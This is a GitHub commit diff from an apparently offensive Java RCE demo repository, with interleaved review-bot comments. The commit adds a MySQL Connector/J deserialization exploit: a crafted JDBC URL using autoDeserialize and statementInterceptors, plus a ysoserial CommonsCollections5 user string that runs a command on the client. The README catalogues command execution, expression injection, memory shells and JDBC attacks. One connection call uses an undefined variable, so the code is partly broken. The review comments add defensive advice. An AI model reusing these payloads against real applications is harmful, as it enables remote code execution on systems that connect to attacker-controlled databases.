Commit cba2dbb

committed
update JDBC Attack mysql :)
1 parent d948629 commit cba2dbb

3 files changed

Lines changed: 54 additions & 16 deletions

File tree

JDBCAttack/pom.xml

Lines changed: 1 addition & 1 deletion
@@ -18,7 +18,7 @@
1818
<groupId>mysql</groupId>
1919
<artifactId>mysql-connector-java</artifactId>
2020
<!-- <version>3.1.11</version>-->
21-
<!-- <version>5.1.19</version>-->
21+
<!-- <version>5.1.29</version>-->
2222
<!-- <version>6.0.6</version>-->
2323
<version>8.0.19</version>
2424
</dependency>
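Review bot: the version the build actually resolves is still `8.0.19`, while the code added in SerializeAttack.java in this same commit targets the `[5.1.1, 5.1.10]` range and loads `com.mysql.jdbc.Driver`; toggling the commented `<version>` lines by hand is easy to get out of step with whichever URL block is active in `main()`. Consider a Maven property (`<version>${connector.version}</version>`) or one profile per tested range, and a comment beside each commented version naming the code block in SerializeAttack.java it belongs to, so a reader knows which driver version reproduces which behaviour and which versions an application should be moved off.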

JDBCAttack/src/main/java/org/example/mysql/SerializeAttack.java

Lines changed: 18 additions & 3 deletions
@@ -2,6 +2,8 @@
22

33
import java.sql.Connection;
44
import java.sql.DriverManager;
5+
import java.sql.PreparedStatement;
6+
import java.sql.ResultSet;
57

68
/**
79
* 反序列化
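Review bot: the newly imported `PreparedStatement` and `ResultSet` are used further down in `main()` without ever being closed, and the `Connection` is not closed either; wrapping them in try-with-resources (`try (Connection con = DriverManager.getConnection(...); PreparedStatement ps = con.prepareStatement(sql); ResultSet rs = ps.executeQuery())`) keeps the demo from leaking the server socket between runs.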
@@ -12,6 +14,21 @@
1214
*/
1315
public class SerializeAttack {
1416
public static void main(String[] args) throws Exception {
17+
/**
18+
* [5.1.1, 5.1.10]
19+
* 使用 statementInterceptors 参数
20+
* 需要通过 查询调用
21+
*/
22+
String serializeAttackUrl_5_1_10 = "jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections5_open -a Calculator.app";
23+
String username = "yso_CommonsCollections5_open -a Calculator.app";
24+
String password = "";
25+
Class.forName("com.mysql.jdbc.Driver");
26+
Connection con = DriverManager.getConnection(serializeAttackUrl_5_1_10, username, password);
27+
String sql = "select database()";
28+
PreparedStatement ps = con.prepareStatement(sql);
29+
ResultSet resultSet = ps.executeQuery();
30+
31+
1532
/**
1633
* [5.1.11, 5.1.48]
1734
* 使用 statementInterceptors 参数
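Review bot: the user name is supplied twice in the `[5.1.1, 5.1.10]` block, once as `user=` inside `serializeAttackUrl_5_1_10` and again as the `username` argument to `getConnection`; keep one and state in the comment which of the two the driver honours for this range, otherwise someone verifying a fix cannot tell which value actually reached the server. The comment should also spell out why this range differs from the `[5.1.11, 5.1.48]` block below it (the `需要通过 查询调用` note says a query must be executed, which is why the `PreparedStatement` and `executeQuery` are there) so the two cases are not confused. It is worth recording for defenders that everything that matters here lives in client-side connection properties (`autoDeserialize=true`, `statementInterceptors`) and the `user` value, which is exactly why an application must never build a JDBC URL or its properties from untrusted input. `resultSet` is also never read or closed.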
@@ -46,9 +63,7 @@ public static void main(String[] args) throws Exception {
4663
// String driver = "com.mysql.jdbc.Driver";
4764
// Class.forName(driver);
4865

49-
50-
Connection connection = DriverManager.getConnection(serializeAttackUrl_8_7_19);
51-
66+
Connection connection = DriverManager.getConnection(serializeAttackUrl_5_29_40);
5267

5368
}
5469

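Review bot: `serializeAttackUrl_5_29_40` is not defined anywhere in the lines shown, and since this is now the only `getConnection` call that runs, every other URL built in `main()` (`serializeAttackUrl_5_1_10`, the removed `serializeAttackUrl_8_7_19`) is dead code; selecting the URL from `args[0]` or a switch keyed on the driver version would make it obvious which case is under test and keep the removed 8.x case reachable. The `connection` here is also never closed.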
README.md

Lines changed: 35 additions & 12 deletions
@@ -4,13 +4,29 @@ By. Whoopsunix
44

55
# 0x00 do what?
66

7-
Java 能获取到权限的 Demo,目前涵盖命令执行、表达式、内存马、JDBC、反序列化、工具类
7+
对照实战场景梳理 Java Rce 相关漏洞进一步利用方式
88

9-
# 命令执行
9+
## 目录
1010

11-
参考 [javaweb-sec](https://github.com/javaweb-sec/javaweb-sec) 很详细
11+
- [命令执行](#0x01-command)
12+
- [执行Demo](#执行demo)
13+
- [执行结果输出(InputStream 处理Demo)](#执行结果输出(InputStream 处理Demo))
14+
- [表达式注入](#0x02-expression-inject)
15+
- [OGNL](#ognl)
16+
- get、set执行,sout输出时的回显
17+
- [SPEL](#spel)
18+
- [JDBC Attack](#0x03-jdbc-attack)
19+
- mysql
1220

13-
## 执行方式
21+
目前涵盖:命令执行及输出、表达式及输出、内存马、JDBC、反序列化、工具类
22+
23+
# 0x01 Command
24+
25+
参考 [javaweb-sec](https://github.com/javaweb-sec/javaweb-sec) 有很详细的例子
26+
27+
[命令执行 Demo](Command)
28+
29+
## 执行Demo
1430

1531
- [x] Runtime
1632
- [x] ProcessBuilder
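Review bot: the table-of-contents anchor `#执行结果输出(InputStream 处理Demo)` contains a space and parentheses, which GitHub does not keep in the heading id it generates, so that link will not resolve; use the slug GitHub derives from the heading (spaces become hyphens, punctuation is dropped). The `- mysql` entry under JDBC Attack is plain text while its siblings are links; point it at the `## [mysql](JDBCAttack)` section for consistency.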
@@ -31,21 +47,28 @@ Java 能获取到权限的 Demo,目前涵盖命令执行、表达式、内存
3147
- [x] org.springframework:spring-core
3248
- [x] org.apache.commons:commons-io
3349

34-
# 表达式注入
50+
# 0x02 expression inject
3551

36-
## OGNL
52+
[表达式注入 Demo](Expression)
3753

38-
## SPEL
54+
## OGNL
3955

56+
- [x] 普通执行demo:get、set
57+
- [x] 有sout的回显 (Ps. 通过 Servlet 的回显移到 RceEcho 章节介绍)
58+
- 原生
59+
- base64加密
4060

61+
# 0x03 JDBC Attack
4162

42-
# JDBC相关
63+
## [mysql](JDBCAttack)
4364

44-
# 内存马
65+
- [x] 文件读取
66+
- [x] 反序列化
4567

46-
# 参考
68+
# 感谢师傅们的研究 带来了很大的帮助 :)
4769

4870
> https://github.com/javaweb-sec/javaweb-sec
49-
>
71+
>
5072
> https://github.com/yzddmr6/Java-Js-Engine-Payloads
51-
>
73+
>
74+
> https://github.com/su18/JDBC-Attack
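Review bot: the `## [mysql](JDBCAttack)` section marks `文件读取` and `反序列化` as done but gives no driver version ranges, while SerializeAttack.java is organised entirely around ranges such as `[5.1.1, 5.1.10]` and `[5.1.11, 5.1.48]`; a short table of range, required connection property (`autoDeserialize`, `statementInterceptors`) and whether a query has to be executed would make the README usable as a reference for checking which Connector/J versions an application should move away from, not only as a runner for the demo. A one-line note on the safe configuration (do not set `autoDeserialize=true`; never assemble the JDBC URL or its properties from untrusted input) would serve the same readers.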
